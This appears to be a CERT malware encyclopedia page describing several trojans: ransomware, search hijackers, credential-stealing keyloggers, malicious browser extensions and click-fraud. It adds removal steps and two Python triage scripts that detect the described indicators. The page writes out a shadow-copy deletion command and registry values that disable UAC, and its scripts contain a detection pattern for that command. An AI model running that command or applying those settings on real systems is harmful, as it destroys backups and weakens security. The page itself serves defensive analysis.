SPECIAL STATE PROTECTION SERVICE
SPECIAL COMMUNICATION AND INFORMATION
SECURITY STATE AGENCY

COMPUTER EMERGENCY
RESPONSE CENTER

Malware

  • Technical Details:

     The program code of the malware is usually embedded in HTML pages.

    It is written in JavaScript.

    The trojan may redirect the user to the attacker's web sites.

  • Remove:

     1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan quits immediately if it detects a running process containing one of the following strings in its name:
    avp.exe
    The trojan can download and execute a file from the Internet.

    The trojan can terminate the following processes:
    cmd.exe
    msconfig.exe
    taskmgr.exe
    WerFault.exe
    The trojan may execute the following commands:
    %windir%\System32\vssadmin.exe delete shadows /all /Quiet
    The following file is dropped:
    %desktop%\!%variable_id%.bmp
    This file/image is set as a wallpaper.

  • Installation:

     The trojan creates copies of the following files (source, destination):
    %windir%\system32\rundll32.exe, %malwarefolder%\rundll32.exe
    %windir%\SysWOW64\rundll32.exe, %malwarefolder%\rundll32.exe
    The trojan launches the following processes:
    %malwarefolder%\rundll32.exe %malwarefolder%\%malwarefilename%,MXS0
    %malwarefolder%\rundll32.exe %malwarefolder%\%malwarefilename%,MXS1
    %malwarefolder%\rundll32.exe %malwarefolder%\%malwarefilename%,MXS2
    %malwarefolder%\rundll32.exe %malwarefolder%\%malwarefilename%,MXS4
    The trojan may create the text file:
    %commonappdata%\Z
    The trojan creates the following file:
    %startup%\!%variable_id%.lnk
    A string with variable content is used instead of %variable_id%.

    The file is a shortcut to a malicious file.

    The trojan keeps various information in the following files:
    %commonappdata%\!%variable_id%.key
    The trojan creates the following files:
    %commonappdata%\!%variable_id%.html
    %commonappdata%\!%variable_id%.bmp
    %nethood%\!%variable_id%.bmp

  • Spreading method:

     The trojan collects the following information:
    operating system version
    The trojan contains a list of (2) IP addresses.

    It tries to connect to the remote machine on port:
    443
    The trojan attempts to send gathered information to a remote machine.

  • Thread:

     Win32/Filecoder.CryptProjectXXX.E is a trojan that encrypts files on fixed, removable and network drives.

    The trojan searches for files with the following file extensions:
    .3DM
    .3DS
    .3G2
    .3GP
    .4DB
    .4DL
    .4MP
    .7Z
    .A3D
    .ABM
    .ABS
    .ABW
    .ACC
    .DB
    .ACT
    .GR
    .ADN
    .ADP
    .AES
    .Da
    .AF2
    .AF3
    .AFT
    .AFX
    .AGIF
    .AGP
    .AHD
    .AI
    .AIC
    .AIF
    .AIM
    .ALBM
    .ALF
    .ANI
    .ANS
    .APD
    .APK
    .APM
    .APNG
    .APP
    .APS
    .APT
    .APX
    .ARC
    .ART
    .ARW
    .ASC
    .ASE
    .ASF
    .ASK
    .ASM
    .ASP
    .ASPX
    .ASW
    .ASX
    .ASY
    .ATY
    .AVI
    .AWDB
    .AWP
    .AWT
    .AWW
    .AZZ
    .BAD
    .BAY
    .BBS
    .BDB
    .BDP
    .BDR
    .BEAN
    .BIB
    .BM2
    .BMP
    .BMX
    .BNA
    .BND
    .BOC
    .BOK
    .BRD
    .BRK
    .BRN
    .BRT
    .BSS
    .BTD
    .BTI
    .BTR
    .BZ2
    .C
    .C2
    .C4
    .C4D
    .CAL
    .CALS
    .CAN
    .CD5
    .CDB
    .CDC
    .CDG
    .CDMM
    .CDMT
    .CDR
    .CDR3
    .CDR4
    .CDR6
    .CDT
    .CER
    .CF
    .CFG
    .CFM
    .CFU
    .CGI
    .CGM
    .CIMG
    .CIN
    .CIT
    .CKP
    .CLASS
    .CLKW
    .CMA
    .CMD
    .CMX
    .CNM
    .CNV
    .COLZ
    .CPC
    .CPD
    .CPG
    .CPP
    .CPS
    .CPT
    .CPX
    .CRD
    .CRT
    .CRWL
    .CRYPT
    .CS
    .CSR
    .CSS
    .CSV
    .CSY
    .CUE
    .CV5
    .CVG
    .CVI
    .CVS
    .CVX
    .CWT
    .CXF
    .CYI
    .DAD
    .DAF
    .DB
    .DB3
    .DBF
    .DBK
    .DBT
    .DBV
    .DBX
    .DCA
    .DCB
    .DCH
    .DCS
    .DCT
    .DCU
    .DCX
    .DDL
    .DDOC
    .DDS
    .DED
    .DF1
    .DG
    .DGN
    .DGS
    .DHS
    .DIB
    .DIF
    .DIP
    .DIZ
    .DJV
    .DJVU
    .DM3
    .DMI
    .DMO
    .DNC
    .DNE
    .DOC
    .DOCB
    .DOCM
    .DOCX
    .DOCZ
    .DOT
    .DOTM
    .DOTX
    .DP1
    .DPP
    .DPX
    .DQY
    .DRW
    .DRZ
    .DSK
    .DSN
    .DSV
    .DT
    .DT2
    .DTA
    .DTD
    .DTSX
    .DTW
    .DVI
    .DVL
    .DWG
    .DX
    .DXB
    .DXF
    .DXL
    .ECO
    .ECW
    .ECX
    .EDB
    .EFD
    .EGC
    .EIO
    .EIP
    .EIT
    .EMD
    .EMF
    .EML
    .EMLX
    .EP
    .EPF
    .EPP
    .EPS
    .EPSF
    .EQL
    .ERF
    .ERR
    .ETF
    .ETX
    .EUC
    .EXR
    .FAL
    .FAQ
    .FAX
    .FB2
    .FB3
    .FBL
    .FBX
    .FCD
    .FCF
    .FDB
    .FDF
    .FDR
    .FDS
    .FDT
    .FDX
    .FDXT
    .FES
    .FFT
    .FH10
    .FH11
    .FH3
    .FH4
    .FH5
    .FH6
    .FH7
    .FH8
    .FIC
    .FID
    .FIF
    .FIG
    .FIL
    .FL
    .FLA
    .FLI
    .FLR
    .FLV
    .FM5
    .FMV
    .FODT
    .FOL
    .FP3
    .FP4
    .FP5
    .FP7
    .FPOS
    .FPT
    .FPX
    .FRM
    .FRT
    .FT10
    .FT11
    .FT7
    .FT8
    .FT9
    .FTN
    .FWDN
    .FXC
    .FXG
    .FZB
    .FZV
    .GADGET
    .GBK
    .GBR
    .GCDP
    .GDB
    .GDOC
    .GED
    .GEM
    .GEO
    .GFB
    .GGR
    .GIF
    .GIH
    .GIM
    .GIO
    .GLOX
    .GPD
    .GPG
    .GPN
    .GPX
    .GRO
    .GROB
    .GRS
    .GSD
    .GTHR
    .GTP
    .GV
    .GWI
    .GZ
    .H
    .HBK
    .HDB
    .HDP
    .HDR
    .HHT
    .HIS
    .HPG
    .HPGL
    .HPI
    .HPL
    .HS
    .HTC
    .HTM
    .HTML
    .HWP
    .HZ
    .I3D
    .IB
    .IBD
    .IBOOKS
    .ICN
    .ICON
    .IDC
    .IDEA
    .IDX
    .IFF
    .IGT
    .IGX
    .IHX
    .IIL
    .IIQ
    .IMD
    .INDD
    .INFO
    .INK
    .IPF
    .IPX
    .ITDB
    .ITW
    .IWI
    .J2C
    .J2K
    .JAR
    .JAS
    .JAVA
    .JB2
    .JBMP
    .JBR
    .JFIF
    .JIA
    .JIS
    .JKS
    .JNG
    .JOE
    .JP1
    .JP2
    .JPE
    .JPEG
    .JPG
    .JPG2
    .JPS
    .JPX
    .JRTF
    .JS
    .JSP
    .JTX
    .JWL
    .JXR
    .KDB
    .KDBX
    .KDC
    .KDI
    .KDK
    .KES
    .KEY
    .KIC
    .KLG
    .KML
    .KMZ
    .KNT
    .KON
    .KPG
    .KWD
    .LAY
    .LAY6
    .LBM
    .LBT
    .LDF
    .LGC
    .LIS
    .LIT
    .LJP
    .LMK
    .LNT
    .LP2
    .LRC
    .LST
    .LTR
    .LTX
    .LUA
    .LUE
    .LUF
    .LWO
    .LWP
    .LWS
    .LYT
    .LYX
    .M
    .M3D
    .M3U
    .M4A
    .M4V
    .MA
    .MAC
    .MAN
    .MAP
    .MAQ
    .MAT
    .MAX
    .MB
    .MBM
    .MBOX
    .MDB
    .MDF
    .MDN
    .MDT
    .ME
    .MEF
    .MELL
    .MFD
    .MFT
    .MGCB
    .MGMT
    .MGMX
    .MID
    .MIN
    .MKV
    .MMAT
    .MML
    .MNG
    .MNR
    .MNT
    .MOBI
    .MOS
    .MOV
    .MP3
    .MP4
    .MPA
    .MPF
    .MPG
    .MPO
    .MRG
    .MRXS
    .MS11
    .MSG
    .MSI
    .MT9
    .MUD
    .MWB
    .MWP
    .MXL
    .MYD
    .MYI
    .MYL
    .NCR
    .NCT
    .NDF
    .NEF
    .NFO
    .NJX
    .NLM
    .NOTE
    .NOW
    .NRW
    .NS2
    .NS3
    .NS4
    .NSF
    .NV2
    .NYF
    .NZB
    .OBJ
    .OC3
    .OC4
    .OC5
    .OCE
    .OCI
    .OCR
    .ODB
    .ODG
    .ODM
    .ODO
    .ODP
    .ODS
    .ODT
    .OFL
    .OFT
    .OMF
    .OPLC
    .OQY
    .ORA
    .ORF
    .ORT
    .ORX
    .OTA
    .OTG
    .OTI
    .OTP
    .OTS
    .OTT
    .OVP
    .OVR
    .OWC
    .OWG
    .OYX
    .OZB
    .OZJ
    .OZT
    .P12
    .P7S
    .P96
    .P97
    .PAGES
    .PAL
    .PAN
    .PANO
    .PAP
    .PAQ
    .PAS
    .PB
    .PBM
    .PC1
    .RDDS
    .RDL
    .RFT
    .RGB
    .RGF
    .RIB
    .RIC
    .RIFF
    .RIS
    .RIX
    .RLE
    .RLI
    .RM
    .RNG
    .RPD
    .RPF
    .RPT
    .RRI
    .RSB
    .RSD
    .RSR
    .RSS
    .RST
    .RT
    .RTD
    .RTF
    .RTX
    .RUN
    .RW2
    .RWL
    .RZK
    .RZN
    .S2MV
    .S3M
    .SAF
    .SAI
    .SAM
    .SAVE
    .SBF
    .SCAD
    .SCC
    .SCH
    .SCI
    .SCM
    .SCT
    .SCV
    .SCW
    .SDB
    .SDF
    .SDM
    .SDOC
    .SDW
    .SEP
    .SFC
    .SFW
    .SGM
    .SH
    .SIG
    .SITX
    .SK1
    .SK2
    .SKM
    .SLA
    .SLD
    .SLDX
    .SLK
    .SLN
    .SLS
    .SMF
    .SMIL
    .SMS
    .SOB
    .SPA
    .SPE
    .SPH
    .SPJ
    .SPP
    .SPQ
    .SPR
    .SQB
    .SQL
    .SQLITE3
    .SQLITEDB
    .SR2
    .SRT
    .SRW
    .SSA
    .SSK
    .ST
    .STC
    .STD
    .STE
    .STI
    .STM
    .STN
    .STP
    .STR
    .STW
    .STY
    .SUB
    .SUMO
    .SVA
    .SVF
    .SVG
    .SVGZ
    .SWF
    .SXC
    .SXD
    .SXG
    .SXI
    .SXM
    .SXW
    .T2B
    .TAB
    .TAR
    .TB0
    .TBK
    .TBN
    .TCX
    .TDF
    .TDT
    .TE
    .TEX
    .TEXT
    .TF
    .TFC
    .TG4
    .TGA
    .TGZ
    .THM
    .THP
    .TIF
    .TIFF
    .TJP
    .TLB
    .TLC
    .TM
    .TM2
    .TMD
    .TMP
    .TMV
    .TMX
    .TN
    .TNE
    .TPC
    .TPI
    .TRM
    .TVJ
    .TXT
    .U3D
    .U3I
    .UDB
    .UFO
    .UFR
    .UGA
    .UNX
    .UOF
    .UOP
    .UOT
    .UPD
    .USR
    .UTF8
    .UTXT
    .V12
    .VB
    .VBR
    .VBS
    .VCF
    .VCT
    .VCXPROJ
    .VDA
    .VDB
    .VDI
    .VEC
    .VFF
    .VMDK
    .VML
    .VMX
    .VNT
    .VOB
    .VPD
    .VPE
    .VRML
    .VRP
    .VSD
    .VSDM
    .VSDX
    .VSM
    .VST
    .VSTX
    .VUE
    .VW
    .WAV
    .WB1
    .WBC
    .WBD
    .WBK
    .WBM
    .WBMP
    .WBZ
    .WCF
    .WDB
    .WDP
    .WEBP
    .WGZ
    .WIRE
    .WKS
    .WMA
    .WMDB
    .WMF
    .WMV
    .WN
    .WP
    .WP4
    .WP5
    .WP6
    .WP7
    .WPA
    .WPD
    .WPE
    .WPG
    .WPL
    .WPS
    .WPT
    .WPW
    .WRI
    .WSC
    .WSD
    .WSF
    .WSH
    .WTX
    .WVL
    .X3D
    .X3F
    .XAR
    .XCODEPROJ
    .XDB
    .XDL
    .XHTM
    .XHTML
    .XLC
    .XLD
    .XLF
    .XLGC
    .XLM
    .XLR
    .XLS
    .XLSB
    .XLSM
    .XLSX
    .XLT
    .XLTM
    .XLTX
    .XLW
    .XML
    .XPM
    .XPS
    .XWP
    .XY3
    .XYP
    .XYW
    .YAL
    .YBK
    .YML
    .YSP
    .YUV
    .Z3D
    .ZABW
    .ZDB
    .ZDC
    .ZIF
    .ZIP
    .ZIPX
    .ZW
    It avoids files which contain any of the following strings in their path:
    \ALLUSE~1\
    \APPDATA\
    \APPLIC~1\
    \COOKIES\
    \F4BC~1\
    \LOCALS~1\
    \PROGRA~1\
    \PROGRA~2\
    \PROGRA~3\
    \PUBLIC\
    \TEMPLA~1\
    AUTOEXEC.BAT
    THUMBS.DB
    %variable_id%

    It avoids those with any of the following strings in their names:
    !
    It avoids files with the following extensions:
    .CRYPT
    The trojan encrypts the file content.

    The RSA and RC4 encryption algorithms are used.

    An additional .cryp1 extension is appended.

    The following files are dropped:
    %currentfolder%\!%variable_id%.html
    %currentfolder%\!%variable_id%.txt
    %startup%\!%variable_id%B.lnk
    %startup%\!%variable_id%H.lnk
    %desktop%\!%variable_id%.bmp
    %desktop%\!%variable_id%.html
    %desktop%\!%variable_id%.txt

    To decrypt the files, the user is asked to comply with the stated conditions in exchange for a password/instructions.

    When file encryption is finished, the trojan removes itself from the computer.
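    The description above gives a responder three host-side indicators for this family: the shadow-copy deletion command, the .cryp1 extension on encrypted files, and the !%variable_id% note, wallpaper and startup-shortcut drops. The following Python is an added example written for this page, not code from the CERT or from any vendor's analysis. It runs those checks over constructed process-creation records and a constructed file listing (the victim id 7F3A9C, the user name and every path are made up for the example) and ties all notes from one infection together by the id they share.

```python
import re
from collections import Counter

# Indicators recorded in the Win32/Filecoder.CryptProjectXXX.E description above.
ENCRYPTED_EXT = ".cryp1"
# Notes, wallpaper and startup shortcuts are all named "!<variable_id>.<ext>";
# the two startup shortcuts carry an extra B or H after the id.
NOTE_RE = re.compile(r"(?:^|\\)!([^\\]+)\.(html|txt|bmp|lnk)$", re.IGNORECASE)
# Shadow-copy deletion run before encryption, so Previous Versions cannot restore files.
VSSADMIN_RE = re.compile(
    r'vssadmin(?:\.exe)?"?\s+delete\s+shadows\s+/all\b(?:\s+/quiet)?', re.IGNORECASE
)


def find_shadow_deletion(process_log_lines):
    """Return the process-creation records whose command line deletes all shadow copies."""
    return [line for line in process_log_lines if VSSADMIN_RE.search(line)]


def triage_file_listing(paths):
    """Split a file listing into encrypted files and dropped notes, counting notes per victim id."""
    findings = {"encrypted": [], "notes": [], "ids": Counter()}
    for path in paths:
        if path.lower().endswith(ENCRYPTED_EXT):
            findings["encrypted"].append(path)
            continue
        m = NOTE_RE.search(path)
        if not m:
            continue
        ident, ext = m.group(1), m.group(2).lower()
        if ext == "lnk" and ident[-1:] in ("B", "H"):
            ident = ident[:-1]  # drop the shortcut suffix to recover the id
        findings["notes"].append(path)
        findings["ids"][ident] += 1
    return findings


def assess(process_log_lines, paths):
    """Combine both checks into the fields a responder would put on an incident ticket."""
    shadow = find_shadow_deletion(process_log_lines)
    files = triage_file_listing(paths)
    return {
        "shadow_copies_deleted": bool(shadow),
        "encrypted_files": len(files["encrypted"]),
        "victim_ids": sorted(files["ids"]),
        "ransomware_indicators": bool(shadow or files["encrypted"] or files["notes"]),
    }


# Constructed sample telemetry for this example (not captured from a real incident).
SAMPLE_PROCESS_LOG = [
    r'2016-05-10 09:12:01 ParentImage=C:\Users\alice\Downloads\invoice.exe '
    r'CommandLine="C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet',
    r'2016-05-10 09:12:03 ParentImage=C:\Windows\explorer.exe '
    r'CommandLine="C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt',
]
SAMPLE_PATHS = [
    r"C:\Users\alice\Documents\budget.xlsx.cryp1",
    r"C:\Users\alice\Documents\!7F3A9C.html",
    r"C:\Users\alice\Documents\!7F3A9C.txt",
    r"C:\Users\alice\Desktop\!7F3A9C.bmp",
    r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!7F3A9CB.lnk",
    r"C:\Users\alice\AppData\Roaming\Mozilla\prefs.js",  # under \APPDATA\, which the trojan skips
    r"C:\Users\alice\Pictures\holiday.jpg",
]

if __name__ == "__main__":
    print(assess(SAMPLE_PROCESS_LOG, SAMPLE_PATHS))
```

    Because the trojan skips every path containing the strings listed above (\APPDATA\, \PROGRA~1\ and so on) and every file whose name contains "!", a listing taken only from those folders will show no encrypted files; run the triage over user document folders and network shares. NOTE_RE is tuned to this family's note naming, so a different .cryp1 family is caught only by the extension check.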

  • Technical Details:

     MSIL/Agent.OJF is a trojan that redirects results of online search engines to specific web sites.

    The following programs are affected:
    Internet Explorer
    Mozilla Firefox
    The trojan requires the Microsoft .NET Framework to run.

  • Installation:

     The trojan does not create any copies of itself.

    The trojan creates the following files:
    %appdata%\Mozilla\Firefox\Profiles\%defaultprofile%\searchplugins\google.xml (2079 B)
    %programfiles%\Mozilla Firefox\searchplugins\google.xml (2079 B)
    The trojan modifies the following file:
    %appdata%\Mozilla\Firefox\Profiles\%defaultprofile%\prefs.js
    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "EnableLUA" = "0"
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorAdmin" = "0"
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
    "DefaultScope" = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
    "(Default)" = "Live Search"
    "DisplayName" = "@ieframe.dll,-12512"
    "URL" = "http://www.google.com/cse?cx=partner-pub%censored%"
    "SuggestionsURLFallback" = "http://www.google.com/cse?cx=partner-pub%censored%"
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchUrl\g]
    "(Default)" = "http://www.google.com/cse?cx=partner-pub-%censored%"
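    The Registry entries above do two things worth auditing on any host this trojan touched: they set both UAC policy values to 0 (EnableLUA=0 disables UAC, ConsentPromptBehaviorAdmin=0 lets administrators elevate without a prompt) and they point Internet Explorer's default search scope at a Google Custom Search URL carrying a partner id, so the operator earns from every search. The Python below is an added example for this page, not code from the CERT or from the analysis it quotes: it parses a .reg export of those keys and reports each weakened value and each search scope routed through a partner-pub CSE. The export text is constructed for the example and the partner id is a PLACEHOLDER where the description shows %censored%.

```python
import re

# UAC policy values that the description above shows the trojan setting to 0.
# EnableLUA=0 disables UAC altogether; ConsentPromptBehaviorAdmin=0 elevates
# administrators silently, without a consent prompt.
POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
WEAK_UAC_VALUES = {"EnableLUA": "0", "ConsentPromptBehaviorAdmin": "0"}
SEARCHSCOPES_KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes"
# Search URLs that route queries through a Google Custom Search Engine with a
# partner id, as in the "URL" value above.
CSE_RE = re.compile(r"google\.com/cse\?.*partner-pub", re.IGNORECASE)


def _normalize(value):
    """Turn .reg value syntax into a plain string ("dword:00000000" -> "0", quotes stripped)."""
    if value.lower().startswith("dword:"):
        return str(int(value[6:], 16))
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1].replace("\\\\", "\\")
    return value


def parse_reg_export(text):
    """Parse a .reg export into {key: {value_name: value}}; '@' is the (Default) value."""
    reg, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            reg.setdefault(key, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$|^@=(.*)$', line)
        if m and key is not None:
            name = m.group(1) if m.group(1) is not None else "(Default)"
            value = m.group(2) if m.group(2) is not None else m.group(3)
            reg[key][name] = _normalize(value)
    return reg


def audit(reg):
    """Return one finding string per weakened UAC value or hijacked IE search scope."""
    findings = []
    policy = reg.get(POLICY_KEY, {})
    for name, weak in WEAK_UAC_VALUES.items():
        if policy.get(name) == weak:
            findings.append(f"UAC weakened: {name} = {weak}")
    default = reg.get(SEARCHSCOPES_KEY, {}).get("DefaultScope", "").strip("{}").lower()
    for key, values in reg.items():
        if not key.startswith(SEARCHSCOPES_KEY + "\\"):
            continue
        if CSE_RE.search(values.get("URL", "")):
            guid = key.rsplit("\\", 1)[1]
            is_default = guid.strip("{}").lower() == default
            findings.append(
                f"IE search scope {guid} routed through a CSE partner id"
                + (" (current default scope)" if is_default else "")
            )
    return findings


# Constructed .reg export for this example (not captured from a real host); the
# partner id is a PLACEHOLDER where the original description shows %censored%.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000
"ConsentPromptBehaviorAdmin"=dword:00000000

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
@="Live Search"
"DisplayName"="@ieframe.dll,-12512"
"URL"="http://www.google.com/cse?cx=partner-pub-PLACEHOLDER"
'''

if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

    A real export produced by reg export is UTF-16 with a byte-order mark, so decode it before passing the text in. Restoring EnableLUA to 1 requires a reboot to take effect, which is why the removal steps for this family end in a restart.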

  • Remove:

     1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan collects the following information:
    operating system version
    information about the operating system and system settings
    language settings
    computer IP address
    The trojan is able to log keystrokes.

    The trojan attempts to send gathered information to a remote machine.

    The trojan contains a URL address. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

    The following Registry entry is set:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
    "RegId" = %variable%
    A variable numerical value is used instead of %variable%.

  • Spreading method:

     The trojan keeps various information in the following files:
    %appdata%\adobesystem.log
    %appdata%\adobe\system.log
    %appdata%\ntuser.dat

  • Technical Details:

     The trojan may delete the following files:
    %desktop%\*Chrome*.lnk
    %desktop%\*Google*.lnk
    %desktop%\*Internet*.lnk
    %desktop%\*Explorer*.lnk
    The trojan may delete the following folders:
    C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\%profile%\extensions
    C:\Documents and Settings\%username%\AppData\Roaming\Mozilla\Firefox\Profiles\%profile%\extension
    The trojan can terminate the following processes:
    chrome.exe
    firefox.exe
    browser.exe

  • Installation:

     The trojan does not create any copies of itself.

    The trojan creates the following files:
    %appdata%\Mozila\ver.dat (3 B)
    %desktop%\Google Chrome.lnk
    %desktop%\Internet Explorer.lnk
    The following Registry entries are set:
    [HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
    "ap" = "2.0-dev-multi-chrome"
    [HKEY_CURRENT_USER\Software\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]

  • Thread:

     The trojan installs browser extensions for the following browsers:
    Google Chrome
    Mozilla Firefox

  • Technical Details:
  • Installation:

     When executed, the trojan copies itself into the following location:
    %appdata%\nJFKrvSGxB\uArVzWJr.exe
    The following files are dropped:
    %temp%\RarSFX%variable1%\JBchppI.exe (45056 B, MSIL/Injector.OJN)
    %temp%\RARSFX%variable1%\srVzWJrYnjUO.bin (503169 B)
    %temp%\%variable2%
    A string with variable content is used instead of %variable1-2%.

    The trojan creates the following file:
    %startup%\YDDYNXdLBf.lnk
    The file is a shortcut to a malicious file.

    This causes the trojan to be executed on every system start.

    The trojan creates copies of the following files (source, destination):
    %windir%\Microsoft.NET\Framework\v2.0.50727\Cvtres.exe, %appdata%\Microsoft\log\securityscan.exe
    The following Registry entries are set:
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    "TaskbarNoNotification" = 1
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]

    The trojan launches the following processes:
    %windir%\Microsoft.NET\Framework\v2.0.50727\Cvtres.exe
    The trojan creates and runs a new thread with its own code within these running processes.

    The trojan terminates its execution if it detects that it's running in a specific virtual environment.

    The trojan quits immediately if it detects a running process containing one of the following strings in its name:
    VboxService.exe
    VMwaretray.exe
    vpc.exe

  • Spreading method:

     The trojan collects the following information:
    login user names for certain applications/services
    login passwords for certain applications/services
    logged keystrokes
    screenshots
    user name
    computer name
    external IP address of the network device
    network adapter information
    CPU information
    memory status
    BIOS version
    installed antivirus software
    default Internet browser
    operating system version
    language settings
    The following programs are affected:
    Google Chrome
    Mozilla Firefox
    Filezilla
    The following services are affected:
    No-IP
    The collected information is stored in the following files:
    %appdata%\Microsoft\log\passwords.txt
    %appdata%\Microsoft\log\logs_%variable%.htm
    A string with variable content is used instead of %variable%.

    The trojan sends the information via e-mail. The SMTP protocol is used.

  • Technical Details:

     The trojan acquires data and commands from a remote computer or the Internet.

    The TCP and HTTP protocols are used in the communication.

    It can execute the following operations:
    download files from a remote computer and/or the Internet
    run executable files
    The malware configuration is passed as command line parameters when the malware executable is launched.

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

    1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan is a malicious Google Chrome extension/plugin.

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used in the communication.

    It can execute the following operations:
    modify the content of websites
    block access to specific websites
    The trojan may redirect the user to the specific web sites.

    The trojan blocks access to any domains that contain any of the following strings in their name:
    2-viruses.com
    aavar.org
    adwarereport.com

  • Installation:

     The trojan does not create any copies of itself.

  • Spreading method:

     The trojan collects the following information:
    URLs visited
    The trojan attempts to send gathered information to a remote machine.

  • Technical Details:

     The trojan is a malicious Google Chrome extension/plugin.

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a URL address. The HTTP protocol is used in the communication.

    It can execute the following operations:
    modify the content of websites
    block access to specific websites
    The trojan may redirect the user to the specific web sites.

    The trojan blocks access to any domains that contain any of the following strings in their name:
    2-viruses.com
    aavar.org
    adwarereport.com

  • Installation:

     The trojan does not create any copies of itself.

  • Spreading method:

     The trojan collects the following information:
    URLs visited
    The trojan attempts to send gathered information to a remote machine.

  • Remove:

     1. Remove all media such as floppy disks, CDs, DVDs, and USB devices. Then restart the computer and please do the following:
    Boot in Safe Mode with Networking on Windows XP, Windows Vista, and Windows 7 systems
    a) Before Windows begins to load, press F8 on your keyboard.
    b) It will display the Advanced Boot Options menu. Select Safe Mode with Networking.

  • Technical Details:

     The trojan contains a list of (11) URLs.

    It tries to download several files from the addresses.

    The files are saved into the following folder:
    %appdata%\Mozila\
    The files are then executed. The HTTP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Technical Details:

     The trojan serves as a proxy server.

    It can execute the following operations:
    open ports
    connect to remote computers on a specific port
    The TCP protocol is used.

  • Installation:

     The trojan does not create any copies of itself.

  • Remove:

     Start the computer in Safe Mode with Networking on Windows 8
    a) Before Windows begins to load, press Shift and F8 on your keyboard.
    b) On the Recovery interface, click 'See advanced repair options'.
    c) Next, click the Troubleshoot option.
    d) Then select Advanced options from the list.
    e) Lastly, choose Windows Startup Settings and click Restart. When Windows restarts, you will be sent to the familiar Advanced Boot Options screen.
    f) Select Safe Mode with Networking from the selection menu.

  • Technical Details:

    The trojan acquires data and commands from a remote computer or the Internet.

    The trojan contains a list of (6) URLs. The HTTP and UDP protocols are used in the communication.

    The trojan sends HTTP requests to simulate clicks on banner advertisements, to inflate web counter statistics etc.

    The trojan keeps various information in the following files:
    %appdata%\u00BD\u009E\u0092\u0093\u00D3\u0099\u009C\u0089
    %commonappdata%\@system3.att
    %commonappdata%\@000001.dat

  • Installation:

     The trojan collects the following information:
    country code
    operating system version
    The trojan attempts to send gathered information to a remote machine. The UDP protocol is used.

  • Spreading method:

     When executed, the trojan copies itself into the following location:
    %appdata%\BrowserMe\ChromeUpdate.exe
    In order to be executed on every system start, the trojan sets the following Registry entry:
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    "BrowserMe" = "%appdata%\BrowserMe\ChromeUpdate.exe"
    The trojan launches the following processes:
    %windir%\system32\svchost.exe -k netsvcs
    %windir%\SysWOW64\svchost.exe -k netsvcs
    %programfiles%\Internet Explorer\iexplore.exe
    %programfiles%\Google\Chrome\Application\chrome.exe

    The trojan creates and runs a new thread with its own code within these running processes.
    The trojan creates the following files:
    %appdata%\u00BD\u009E\u0092\u0093\u00D3\u0099\u009C\u0089 (480 B)
    %commonappdata%\@system3.att (656 B)
    The trojan may create the following files:
    %localappdata%\Google\Chrome\local.dat
    %localappdata%\Google\Chrome\clocal.dat
    %localappdata%\Google\Chrome\Plug\background.html (68 B)
    %localappdata%\Google\Chrome\Plug\background.js (204 B)
